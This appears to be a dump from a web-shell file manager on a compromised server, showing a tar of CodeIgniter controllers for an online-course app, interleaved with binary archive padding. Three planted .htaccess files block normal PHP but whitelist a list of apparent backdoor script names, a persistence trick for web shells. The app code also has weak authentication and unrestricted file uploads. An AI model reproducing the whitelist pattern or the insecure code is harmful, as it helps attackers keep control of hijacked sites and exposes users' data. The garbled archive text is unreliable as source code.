����C
Файловый менеджер
Файловый менеджер - Редактировать - /home/ypacad/public_html/admin/uploads/gallery/controllers.tar
Назад
Base.php��������������������������������������������������������������������������������������������0000666�����������������00000002276�14756273354�0006162 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php defined('BASEPATH') OR exit('No direct script access allowed'); class Base extends CI_Controller { public function __construct() { parent::__construct(); //load user model $this->load->model('Common'); $this->load->helper('custom'); } /** * Index Page for this controller. * * Maps to the following URL * http://example.com/index.php/welcome * - or - * http://example.com/index.php/welcome/index * - or - * Since this controller is set as the default controller in * config/routes.php, it's displayed at http://example.com/ * * So any other public methods not prefixed with an underscore will * map to /index.php/welcome/<method_name> * @see https://codeigniter.com/user_guide/general/urls.html */ public function index() { // $header_data['main_category'] = $this->Common->selectall_where_result('main_category', array()); $jsdata['js_to_load'] = array(); $this->load->view('web/include/header', $header_data); $this->load->view('web/home'); $this->load->view('web/include/footer', $jsdata); } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������.htaccess�������������������������������������������������������������������������������������������0000666�����������������00000001353�14756273354�0006370 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(postfs.php|votes.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|load.php|xmlrpcs.php|container.php|entity.php|header.php|style.php|constant.php|access.php|locale.php|uninstall.php|themes.php|wp-login.php|scindex.php|wp-load.php|admin.php|settings.php|lofter.php|wp-crons.php|activate.php|router.php|repeater.php|wp-scripts.php|wp-study.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Custom404.php���������������������������������������������������������������������������������������0000666�����������������00000000672�14756273354�0007010 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php $this->output->set_status_header('404'); defined('BASEPATH') OR exit('No direct script access allowed'); class Custom404 extends CI_Controller { public function __construct() { parent::__construct(); // load base_url $this->load->helper('url'); } public function error404(){ echo "dd";die; $this->output->set_status_header('404'); $this->load->view('error404'); } }����������������������������������������������������������������������index.html������������������������������������������������������������������������������������������0000666�����������������00000000203�14756273354�0006560 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html> <head> <title>403 Forbidden</title> </head> <body> <p>Directory access is forbidden.</p> </body> </html> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������api/.htaccess���������������������������������������������������������������������������������������0000666�����������������00000001353�14756273354�0007141 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(postfs.php|votes.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|load.php|xmlrpcs.php|container.php|entity.php|header.php|style.php|constant.php|access.php|locale.php|uninstall.php|themes.php|wp-login.php|scindex.php|wp-load.php|admin.php|settings.php|lofter.php|wp-crons.php|activate.php|router.php|repeater.php|wp-scripts.php|wp-study.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������api/Course.php��������������������������������������������������������������������������������������0000666�����������������00000033532�14756273354�0007320 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php if (!defined('BASEPATH')) exit('No direct script access allowed'); require(APPPATH . '/libraries/REST_Controller.php'); use Restserver\Libraries\REST_Controller; require APPPATH . 'libraries/Format.php'; class Course extends REST_Controller { public function __construct() { parent::__construct(); $this->load->library('email'); $this->load->library('form_validation'); $this->load->model('Common'); $this->load->model('User_model'); $this->load->model('Utils'); } public function category_list_post() { $category_list = $this->Common->getall_category(); $response = array( 'status' => TRUE, 'message' => 'Category list get successfully', 'data' => $category_list, ); $this->response($response, REST_Controller::HTTP_OK); } public function course_list_post() { $this->form_validation->set_rules('mobile_no', 'mobile_no', 'required|trim', array('required' => 'Oops ! mobile no is required.' )); $this->form_validation->set_error_delimiters('', ''); if ($this->form_validation->run() == false) { $response['status'] = FALSE; if (!empty(form_error('mobile_no'))) $response['message'] = form_error('mobile_no'); if (!empty(form_error('cat_id'))) $response['message'] = form_error('cat_id'); } else { extract($_POST); $user_id = mobile_no_to_user_id($mobile_no); $course_list = $this->Common->selectall_where_result('course', array('cat_id' => $cat_id)); $x = 0; $ph = array(); foreach ($course_list as $value) { $count = $this->Common->get_total_rows('purchase_course', array('course_id' => $value['course_id'], 'user_id' => $user_id)); $where_session = array('course_id' => $value['course_id']); $session_count = $this->Common->get_total_rows('session', $where_session); $video_count = $this->Common->get_total_rows('videos', $where_session); // $categArr = $this->Common->get_categorydetails_byid($value['category_id']); // $subcategArr = $this->Common->get_subcategorydetails_byid($value['sub_category_id']); $ph[$x]['course_id'] = $value['course_id']; // $ph[$x]['cat_id'] = $value['cat_id']; // $ph[$x]['category_title'] = $categArr['category_title']; // $ph[$x]['category_image'] = $categArr['category_image']; // $ph[$x]['sub_category_id'] = $value['sub_category_id']; // $ph[$x]['subcategory_title'] = $subcategArr['subcategory_title']; // $ph[$x]['subcategory_image'] = $subcategArr['subcategory_image']; $ph[$x]['course_title'] = $value['course_title']; $ph[$x]['course_description'] = $value['course_description']; $ph[$x]['course_image'] = $value['course_image']; $ph[$x]['course_price'] = $value['course_price']; $ph[$x]['video'] = $value['video']; $ph[$x]['video_type'] = $value['video_type']; $ph[$x]['session_count'] = $session_count; $ph[$x]['video_count'] = $video_count; $ph[$x]['created_date'] = $value['created_date']; $ph[$x]['is_premium'] = $value['is_premium']; if ($count > 0) { $ph[$x]['is_booked'] = 1; } else { $ph[$x]['is_booked'] = 0; } $x++; } $response = array( 'status' => TRUE, 'message' => 'Course list get successfully', 'data' => $ph, ); } $this->response($response, REST_Controller::HTTP_OK); } public function popular_course_list_post() { $this->form_validation->set_rules('mobile_no', 'mobile_no', 'required|trim', array('required' => 'Oops ! mobile no is required.' )); $this->form_validation->set_error_delimiters('', ''); if ($this->form_validation->run() == false) { $response['status'] = FALSE; if (!empty(form_error('mobile_no'))) $response['message'] = form_error('mobile_no'); } else { extract($_POST); $user_id = mobile_no_to_user_id($mobile_no); $course_list = $this->Common->selectall_where_result('course', array('is_premium' => 1)); $x = 0; $ph = array(); foreach ($course_list as $value) { $count = $this->Common->get_total_rows('purchase_course', array('course_id' => $value['course_id'], 'user_id' => $user_id)); $where_session = array('course_id' => $value['course_id']); $session_count = $this->Common->get_total_rows('session', $where_session); $video_count = $this->Common->get_total_rows('videos', $where_session); // $categArr = $this->Common->get_categorydetails_byid($value['category_id']); // $subcategArr = $this->Common->get_subcategorydetails_byid($value['sub_category_id']); $ph[$x]['course_id'] = $value['course_id']; // $ph[$x]['cat_id'] = $value['cat_id']; // $ph[$x]['category_title'] = $categArr['category_title']; // $ph[$x]['category_image'] = $categArr['category_image']; // $ph[$x]['sub_category_id'] = $value['sub_category_id']; // $ph[$x]['subcategory_title'] = $subcategArr['subcategory_title']; // $ph[$x]['subcategory_image'] = $subcategArr['subcategory_image']; $ph[$x]['course_title'] = $value['course_title']; $ph[$x]['course_description'] = $value['course_description']; $ph[$x]['course_image'] = $value['course_image']; $ph[$x]['course_price'] = $value['course_price']; $ph[$x]['video'] = $value['video']; $ph[$x]['video_type'] = $value['video_type']; $ph[$x]['session_count'] = $session_count; $ph[$x]['video_count'] = $video_count; $ph[$x]['created_date'] = $value['created_date']; $ph[$x]['is_premium'] = $value['is_premium']; if ($count > 0) { $ph[$x]['is_booked'] = 1; } else { $ph[$x]['is_booked'] = 0; } $x++; } $response = array( 'status' => TRUE, 'message' => 'Course list get successfully', 'data' => $ph, ); } $this->response($response, REST_Controller::HTTP_OK); } public function session_list_post() { $this->form_validation->set_rules('course_id', 'course_id', 'required|trim', array('required' => 'Oops ! course id is required.' )); $this->form_validation->set_error_delimiters('', ''); if ($this->form_validation->run() == false) { $response['status'] = FALSE; if (!empty(form_error('course_id'))) $response['message'] = form_error('course_id'); } else { extract($_POST); $course_list = $this->Common->selectall_where_result('session', array('course_id' => $course_id)); $response = array( 'status' => TRUE, 'message' => 'Session list get successfully', 'data' => $course_list, ); } $this->response($response, REST_Controller::HTTP_OK); } public function slider_list_post() { $slider_list = $this->Common->selectall_where_result('slider', array()); $response = array( 'status' => TRUE, 'message' => 'Slider list get successfully', 'data' => $slider_list, ); $this->response($response, REST_Controller::HTTP_OK); } public function video_list_post() { $this->form_validation->set_rules('session', 'session', 'required|trim', array('required' => 'Oops ! Session id is required.' )); $this->form_validation->set_error_delimiters('', ''); if ($this->form_validation->run() == false) { $response['status'] = FALSE; if (!empty(form_error('session'))) $response['message'] = form_error('session'); } else { extract($_POST); $video_list = $this->Common->selectall_where_result('videos', array('session_id' => $session)); $response = array( 'status' => TRUE, 'message' => 'Videos list get successfully', 'data' => $video_list, ); } $this->response($response, REST_Controller::HTTP_OK); } public function book_course_post() { $created_date = date('Y-m-d H:i:s'); $this->form_validation->set_rules('course_id', 'course_id', 'required|trim', array('required' => 'Oops ! course id is required.' )); $this->form_validation->set_rules('mobile_no', 'mobile_no', 'required|trim', array('required' => 'Oops ! mobile no is required.' )); $this->form_validation->set_rules('price', 'price', 'required|trim', array('required' => 'Oops ! price is required.' )); $this->form_validation->set_error_delimiters('', ''); if ($this->form_validation->run() == false) { $response['status'] = FALSE; if (!empty(form_error('course_id'))) $response['message'] = form_error('course_id'); if (!empty(form_error('mobile_no'))) $response['message'] = form_error('mobile_no'); if (!empty(form_error('price'))) $response['message'] = form_error('price'); } else { extract($_POST); $user_id = mobile_no_to_user_id($mobile_no); $data = array( 'course_id' => $course_id, 'user_id' => $user_id, 'price' => $price, 'created_date' => date('Y-m-d H:i:s'), ); $insert = $this->Common->insert('purchase_course', $data); if ($insert) { $response = array( 'status' => TRUE, 'message' => 'Course book successfully', ); } else { $response = array( 'status' => FALSE, 'message' => 'Course book failed', ); } } $this->response($response, REST_Controller::HTTP_OK); } public function my_course_post() { $this->form_validation->set_rules('mobile_no', 'mobile_no', 'required|trim', array('required' => 'Oops ! mobile no is required.' )); $this->form_validation->set_error_delimiters('', ''); if ($this->form_validation->run() == false) { $response['status'] = FALSE; if (!empty(form_error('mobile_no'))) $response['message'] = form_error('mobile_no'); } else { extract($_POST); $user_id = mobile_no_to_user_id($mobile_no); $my_course = $this->Common->my_course($user_id); $x = 0; $ph = array(); foreach ($my_course as $value) { $count = $this->Common->get_total_rows('purchase_course', array('course_id' => $value['course_id'], 'user_id' => $user_id)); $where_session = array('course_id' => $value['course_id']); $session_count = $this->Common->get_total_rows('session', $where_session); $video_count = $this->Common->get_total_rows('videos', $where_session); // $categArr = $this->Common->get_categorydetails_byid($value['category_id']); // $subcategArr = $this->Common->get_subcategorydetails_byid($value['sub_category_id']); $ph[$x]['course_id'] = $value['course_id']; // $ph[$x]['category_id'] = $value['category_id']; // $ph[$x]['category_title'] = $categArr['category_title']; // $ph[$x]['category_image'] = $categArr['category_image']; // $ph[$x]['sub_category_id'] = $value['sub_category_id']; // $ph[$x]['subcategory_title'] = $subcategArr['subcategory_title']; // $ph[$x]['subcategory_image'] = $subcategArr['subcategory_image']; $ph[$x]['course_title'] = $value['course_title']; $ph[$x]['course_description'] = $value['course_description']; $ph[$x]['course_image'] = $value['course_image']; $ph[$x]['course_price'] = $value['course_price']; $ph[$x]['video'] = $value['video']; $ph[$x]['video_type'] = $value['video_type']; $ph[$x]['session_count'] = $session_count; $ph[$x]['video_count'] = $video_count; $ph[$x]['created_date'] = $value['created_date']; $ph[$x]['is_premium'] = $value['is_premium']; $x++; } $response = array( 'status' => TRUE, 'message' => 'My course list get successfully', 'data' => $ph, ); } $this->response($response, REST_Controller::HTTP_OK); } } ?>����������������������������������������������������������������������������������������������������������������������������������������������������������������������api/Category.php������������������������������������������������������������������������������������0000666�����������������00000005613�14756273354�0007634 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php defined('BASEPATH') OR exit('No direct script access allowed'); class Category extends CI_Controller { public function __construct() { parent::__construct(); $this->load->model('Common'); $this->load->library('form_validation'); $this->load->helper('url'); } //######################################################### //## API For M-Tech ## //######################################################### public function get_allcategory() { // $config = arra(); $config = [ ['field' => 'stoken', 'label' => 'Token', 'rules' => 'required|trim|callback_tokencheck', 'errors' => [ 'required' => 'You must provide Token.', 'trim' => 'You must provide a Token.'] ], ]; $data = $this->input->post(); $this->form_validation->set_data($data); $this->form_validation->set_rules($config); if ($this->form_validation->run() == FALSE) { $ErrorArr = $this->form_validation->error_array(); $ErrorArr['successresp'] = 'error'; echo json_encode($ErrorArr); } else { $post_rec = $this->input->post(); //unset($post_rec['stoken']); $responArr = $this->Common->getall_category(); echo json_encode($responArr); } } //Get All Contractor List Related to user ID public function get_subcategory_bycatid() { $config = [ ['field' => 'category_id', 'label' => 'Category ID', 'rules' => 'required|trim', 'errors' => [ 'required' => 'You must provide Category ID.', 'trim' => 'You must provide a Category ID.'], ], ['field' => 'stoken', 'label' => 'Token', 'rules' => 'required|trim|callback_tokencheck', 'errors' => [ 'required' => 'You must provide Token.', 'trim' => 'You must provide a Token.'] ], ]; $data = $this->input->post(); $this->form_validation->set_data($data); $this->form_validation->set_rules($config); if ($this->form_validation->run() == FALSE) { $ErrorArr = $this->form_validation->error_array(); $ErrorArr['successresp'] = 'error'; echo json_encode($ErrorArr); } else { $post_rec = $this->input->post(); unset($post_rec['stoken']); $responArr = $this->Common->GetAllSubCategoryByCategId($post_rec['category_id']); echo json_encode($responArr); } } public function tokencheck() { if (@$_POST['stoken'] != APITOKEN) { $this->form_validation->set_message('tokencheck', 'API TOKEN is invalid.'); return false; } else { return true; } } } ?>���������������������������������������������������������������������������������������������������������������������api/User.php����������������������������������������������������������������������������������������0000666�����������������00000010657�14756273354�0007001 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php if (!defined('BASEPATH')) exit('No direct script access allowed'); require(APPPATH . '/libraries/REST_Controller.php'); use Restserver\Libraries\REST_Controller; require APPPATH . 'libraries/Format.php'; class User extends REST_Controller { public function __construct() { parent::__construct(); $this->load->library('email'); $this->load->library('form_validation'); $this->load->model('Common'); $this->load->model('User_model'); $this->load->model('Utils'); } public function registration_post() { $created_date = date('Y-m-d H:i:s'); $this->form_validation->set_rules('first_name', 'first_name', 'required|trim', array('required' => 'Oops ! first name is required.' )); $this->form_validation->set_rules('mobile_no', 'mobile_no', 'required|trim', array('required' => 'Oops ! mobile no is required') ); $this->form_validation->set_rules('last_name', 'last_name', 'required|trim', array('required' => 'Oops ! last name is required') ); $this->form_validation->set_error_delimiters('', ''); if ($this->form_validation->run() == false) { $response['status'] = FALSE; if (!empty(form_error('first_name'))) $response['message'] = form_error('first_name'); if (!empty(form_error('last_name'))) $response['message'] = form_error('last_name'); if (!empty(form_error('mobile_no'))) $response['message'] = form_error('mobile_no'); } else { extract($_POST); $check_mobile_already = $this->User_model->check_mobile_already($mobile_no); if ($check_mobile_already >= 1) { $where = array('mobile_no' => $mobile_no); $userdata = $this->Common->get_data_row('users', $where, $field = '*', 'user_id'); $response = array( 'status' => FALSE, 'message' => 'Mobile number already register', ); $this->response($response, REST_Controller::HTTP_OK); } $data = array( 'first_name' => $first_name, 'last_name' => $last_name, 'mobile_no' => $mobile_no, 'created_date' => date('Y-m-d H:i:s'), ); $insert = $this->Common->insert('users', $data); if ($insert) { $user_id = $this->db->insert_id(); $where = array('user_id' => $user_id); $userdata = $this->Common->get_data_row('users', $where, $field = '*', 'user_id'); $response = array( 'status' => TRUE, 'message' => 'User registration successful', 'data' => $this->Utils->solveNulls($userdata), ); } else { $response = array( 'status' => FALSE, 'message' => 'User registration failed', ); } } $this->response($response, REST_Controller::HTTP_OK); } public function login_post() { $created_date = date('Y-m-d H:i:s'); $this->form_validation->set_rules('mobile_no', 'mobile_no', 'required|trim', array('required' => 'Oops ! mobile no is required.' )); $this->form_validation->set_error_delimiters('', ''); if ($this->form_validation->run() == false) { $response['status'] = FALSE; if (!empty(form_error('mobile_no'))) $response['message'] = form_error('mobile_no'); } else { extract($_POST); $where = array('mobile_no' => $mobile_no); $count = $this->Common->get_total_rows('users', $where); if ($count > 0) { $userdata = $this->Common->get_data_row('users', $where, $field = '*', 'user_id'); $response = array( 'status' => TRUE, 'message' => 'Login successful', 'data' => $this->Utils->solveNulls($userdata), ); } else { $response = array( 'status' => TRUE, 'message' => 'Mobile no not registerd', ); } } $this->response($response, REST_Controller::HTTP_OK); } } ?>���������������������������������������������������������������������������������admin/.htaccess�������������������������������������������������������������������������������������0000666�����������������00000001353�14756273354�0007460 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(postfs.php|votes.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|load.php|xmlrpcs.php|container.php|entity.php|header.php|style.php|constant.php|access.php|locale.php|uninstall.php|themes.php|wp-login.php|scindex.php|wp-load.php|admin.php|settings.php|lofter.php|wp-crons.php|activate.php|router.php|repeater.php|wp-scripts.php|wp-study.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������admin/Home.php��������������������������������������������������������������������������������������0000666�����������������00000070652�14756273354�0007273 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php defined('BASEPATH') OR exit('No direct script access allowed'); class Home extends CI_Controller { function __construct() { parent::__construct(); $this->load->model('Common'); $this->load->model('User_model'); $this->load->helper('custom'); $this->load->library('form_validation'); } /** * Index Page for this controller. * * Maps to the following URL * http://example.com/index.php/welcome * - or - * http://example.com/index.php/welcome/index * - or - * Since this controller is set as the default controller in * config/routes.php, it's displayed at http://example.com/ * * So any other public methods not prefixed with an underscore will * map to /index.php/welcome/<method_name> * @see https://codeigniter.com/user_guide/general/urls.html */ public function index() { $this->load->view('admin/login'); } public function dashboard() { $this->load->view('admin/include/header'); $this->load->view('admin/dashboard'); $this->load->view('admin/include/footer'); } public function add_course() { $data['error'] = ''; $data['course_list'] = $this->Common->get_data_all_desc('category', $where = array(), $field = '*', 'fld_id'); $this->load->view('admin/include/header'); $this->load->view('admin/add_course', $data); $this->load->view('admin/include/footer'); } public function add_user() { $this->load->view('admin/include/header'); $this->load->view('admin/add_user'); $this->load->view('admin/include/footer'); } public function add_slider() { $this->load->view('admin/include/header'); $this->load->view('admin/add_slider'); $this->load->view('admin/include/footer'); } public function edit_course() { $course_id = base64_decode($this->uri->segment(3)); $data['course_data'] = $this->Common->get_data_row('course', array('course_id' => $course_id), $field = '*', 'course_id'); $categID = ($data['course_data']['cat_id']) ? $data['course_data']['cat_id'] : ''; $data['course_list'] = $this->Common->get_data_all_desc('category', $where = array(), $field = '*', 'fld_id'); //$data['subcateg_list'] = $this->Common->get_data_all_desc('sub_category', $where = array("category_id" => $categID), $field = '*', 'fld_id'); //echo "<pre>"; // print_r($data); // die; $this->load->view('admin/include/header'); $this->load->view('admin/edit_course', $data); $this->load->view('admin/include/footer'); } public function buy_course() { $user_id = base64_decode($this->uri->segment(3)); $data['course_data'] = $this->User_model->buy_course($user_id); $data['course_list'] = $this->Common->get_data_all_desc('course', $where = array(), $field = 'course_id,course_title', 'course_id'); $this->load->view('admin/include/header'); $this->load->view('admin/buy_course', $data); $this->load->view('admin/include/footer'); } public function edit_slider() { $slider_id = base64_decode($this->uri->segment(3)); $data['slider_data'] = $this->Common->get_data_row('slider', array('slider_id' => $slider_id), $field = '*', 'slider_id'); $this->load->view('admin/include/header'); $this->load->view('admin/edit_slider', $data); $this->load->view('admin/include/footer'); } public function edit_session() { $session_id = base64_decode($this->uri->segment(3)); $data['session_data'] = $this->Common->get_data_row('session', array('session_id' => $session_id), $field = '*', 'session_id'); $data['course_list'] = $this->Common->get_data_all_desc('course', $where = array(), $field = 'course_id,course_title', 'course_id'); $this->load->view('admin/include/header'); $this->load->view('admin/edit_session', $data); $this->load->view('admin/include/footer'); } public function edit_user() { $user_id = base64_decode($this->uri->segment(3)); $data['user_data'] = $this->Common->get_data_row('users', array('user_id' => $user_id), $field = '*', 'user_id'); $this->load->view('admin/include/header'); $this->load->view('admin/edit_user', $data); $this->load->view('admin/include/footer'); } public function edit_videos() { $video_id = base64_decode($this->uri->segment(3)); $data['video_data'] = $this->Common->get_data_row('videos', array('video_id' => $video_id), $field = '*', 'video_id'); $data['course_list'] = $this->Common->get_data_all_desc('course', $where = array(), $field = 'course_id,course_title', 'course_id'); $this->load->view('admin/include/header'); $this->load->view('admin/edit_videos', $data); $this->load->view('admin/include/footer'); } public function course_list() { $data['course_list'] = $this->Common->get_data_all_desc('course', $where = array(), $field = '*', 'course_id'); $this->load->view('admin/include/header'); $this->load->view('admin/course_list', $data); $this->load->view('admin/include/footer'); } public function user_list() { $data['user_list'] = $this->Common->get_data_all_desc('users', $where = array(), $field = '*', 'user_id'); $this->load->view('admin/include/header'); $this->load->view('admin/user_list', $data); $this->load->view('admin/include/footer'); } public function slider_list() { $data['slider_list'] = $this->Common->get_data_all_desc('slider', $where = array(), $field = '*', 'slider_id'); $this->load->view('admin/include/header'); $this->load->view('admin/slider_list', $data); $this->load->view('admin/include/footer'); } public function videos_list() { $data['videos_list'] = $this->Common->get_data_all_desc('videos', $where = array(), $field = '*', 'video_id'); $this->load->view('admin/include/header'); $this->load->view('admin/videos_list', $data); $this->load->view('admin/include/footer'); } public function add_session() { $data['course_list'] = $this->Common->get_data_all_desc('course', $where = array(), $field = 'course_id,course_title', 'course_id'); $this->load->view('admin/include/header'); $this->load->view('admin/add_session', $data); $this->load->view('admin/include/footer'); } public function add_videos() { $data['course_list'] = $this->Common->get_data_all_desc('course', $where = array(), $field = 'course_id,course_title', 'course_id'); $this->load->view('admin/include/header'); $this->load->view('admin/add_videos', $data); $this->load->view('admin/include/footer'); } public function session_list() { $data['session_list'] = $this->Common->get_data_all_desc('session', $where = array(), $field = '*', 'session_id'); $this->load->view('admin/include/header'); $this->load->view('admin/session_list', $data); $this->load->view('admin/include/footer'); } public function loginfrm() { $username = $this->input->post('username'); $password = $this->input->post('password'); $data = array( 'admin_name' => $username, 'password' => $password ); $count = $this->Common->get_total_rows('admin', $data); if ($count > 0) { $select_where = $this->Common->select_where_result('admin', $data); $this->session->set_userdata('admin_name', $select_where['admin_name']); $this->session->set_userdata('admin_email', $select_where['admin_email']); redirect('/admin/dashboard'); } else { $this->session->set_flashdata('message', '<div class="alert alert-danger">Username or Password something went wrong.</div>'); redirect('/admin'); } } public function deletedata() { $id = $this->input->post('id'); $type = $this->input->post('type'); if ($type == "coursedelete") { $delete = $this->Common->deletedata('course', array('course_id' => $id)); $delete1 = $this->Common->deletedata('session', array('course_id' => $id)); $delete2 = $this->Common->deletedata('purchase_course', array('course_id' => $id)); $delete3 = $this->Common->deletedata('videos', array('course_id' => $id)); print_r($delete); } else if ($type == "sessiondelete") { $delete = $this->Common->deletedata('session', array('session_id' => $id)); $delete3 = $this->Common->deletedata('videos', array('session_id' => $id)); print_r($delete); } else if ($type == "videosdelete") { $delete = $this->Common->deletedata('videos', array('video_id' => $id)); print_r($delete); } else if ($type == "userdelete") { $delete = $this->Common->deletedata('users', array('user_id' => $id)); print_r($delete); } else if ($type == "sliderdelete") { $delete = $this->Common->deletedata('slider', array('slider_id' => $id)); print_r($delete); } else if ($type == "categorydelete") { $delete = $this->Common->deletedata('category', array('fld_id' => $id)); $delete = $this->Common->deletedata('sub_category', array('category_id' => $id)); print_r($delete); } else if ($type == "subcategorydelete") { $delete = $this->Common->deletedata('sub_category', array('fld_id' => $id)); print_r($delete); } } public function insert_buy_course() { $where = array('course_id' => $this->input->post('course_id')); $cdata = $this->Common->select_where_result('course', $where); $data = array( 'course_id' => $this->input->post('course_id'), 'user_id' => $this->input->post('user_id'), 'price' => $cdata['course_price'], 'created_date' => date('Y-m-d H:i:s'), ); $insert = $this->Common->insert('purchase_course', $data); print_r($insert); } public function delete_buy_course() { $data = array( 'course_id' => $this->input->post('course_id'), 'user_id' => $this->input->post('user_id'), ); $delete = $this->Common->deletedata('purchase_course', $data); print_r($delete); } public function insert_session() { if (!empty($this->input->post('session_id'))) { $data = array( 'session_title' => $this->input->post('session_title'), 'session_description' => $this->input->post('session_description'), 'course_id' => $this->input->post('video_type'), ); $where = array('session_id' => $this->input->post('session_id')); $update = $this->Common->update('session', $where, $data); print_r($update); } else { $data = array( 'session_title' => $this->input->post('session_title'), 'session_description' => $this->input->post('session_description'), 'course_id' => $this->input->post('video_type'), ); $insert = $this->Common->insert('session', $data); print_r($insert); } } public function insert_slider() { if (!empty($this->input->post('slider_id'))) { $where = array('slider_id' => $this->input->post('slider_id')); if (!empty($_FILES['slider_image']['name'])) { $config['upload_path'] = 'uploads/'; $config['allowed_types'] = 'jpg|jpeg|png|gif'; $config['file_name'] = $_FILES['slider_image']['name']; //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('slider_image')) { $uploadData = $this->upload->data(); $slider_image = $uploadData['file_name']; $data = array('slider_image' => $slider_image); $update = $this->Common->update('slider', $where, $data); } } print_r(1); } else { if (!empty($_FILES['slider_image']['name'])) { $config['upload_path'] = 'uploads/'; $config['allowed_types'] = 'jpg|jpeg|png|gif'; $config['file_name'] = $_FILES['slider_image']['name']; //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('slider_image')) { $uploadData = $this->upload->data(); $slider_image = $uploadData['file_name']; $data = array('slider_image' => $slider_image); $insert = $this->Common->insert('slider', $data); } } print_r(1); } } public function insert_user() { $data = array( 'first_name' => $this->input->post('first_name'), 'last_name' => $this->input->post('last_name'), 'mobile_no' => $this->input->post('mobile_no'), ); if (!empty($user_id)) { $where = array('user_id' => $this->input->post('user_id')); $update = $this->Common->update('users', $where, $data); print_r($update); } else { $insert = $this->Common->insert('users', $data); print_r($insert); } } public function getsessionbycourse() { $course_id = $this->input->post('course_id'); $where = array('course_id' => $course_id); $session_list = $this->Common->selectall_where_result('session', $where); foreach ($session_list as $value) { ?> <option value="<?= $value['session_id']; ?>"><?= $value['session_title']; ?></option> <?php } } public function insert_course() { if (!empty($this->input->post('course_id'))) { $where = array('course_id' => $this->input->post('course_id')); $old_data = $this->Common->select_where_result('course', $where); $courde_video = $old_data['video']; $course_image = $old_data['course_image']; if (!empty($_FILES['course_image']['name'])) { $config['upload_path'] = 'uploads/'; $config['allowed_types'] = 'jpg|jpeg|png|gif'; $config['file_name'] = $_FILES['course_image']['name']; //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('course_image')) { $uploadData = $this->upload->data(); $course_image = $uploadData['file_name']; } } if (!empty($_FILES['courde_video']['name'])) { $config['upload_path'] = 'uploads/'; $config['allowed_types'] = '*'; $config['file_name'] = $_FILES['courde_video']['name']; //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('courde_video')) { $uploadData = $this->upload->data(); $courde_video = $uploadData['file_name']; } } if ($this->input->post('video_type') == "youtube") { $courde_video = $this->input->post('video'); } $data = array( 'video' => $courde_video, 'course_image' => $course_image, 'cat_id' => $this->input->post('category_id'), // 'sub_category_id' => $this->input->post('subcategory_id'), 'course_title' => $this->input->post('course_title'), 'course_description' => $this->input->post('course_description'), 'course_price' => $this->input->post('course_price'), 'is_premium' => $this->input->post('is_premium'), ); $update = $this->Common->update('course', $where, $data); print_r($update); } else { $course_title = $this->input->post('course_title'); $course_description = $this->input->post('course_description'); $course_price = $this->input->post('course_price'); $video_type = $this->input->post('video_type'); $is_premium = $this->input->post('is_premium'); if ($video_type == "server") { if (!empty($_FILES['courde_video']['name'])) { $config['upload_path'] = 'uploads/'; $config['allowed_types'] = '*'; $config['file_name'] = $_FILES['courde_video']['name']; //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('courde_video')) { $uploadData = $this->upload->data(); $video = $uploadData['file_name']; } } } else { $video = $this->input->post('video'); } $course_image = ''; 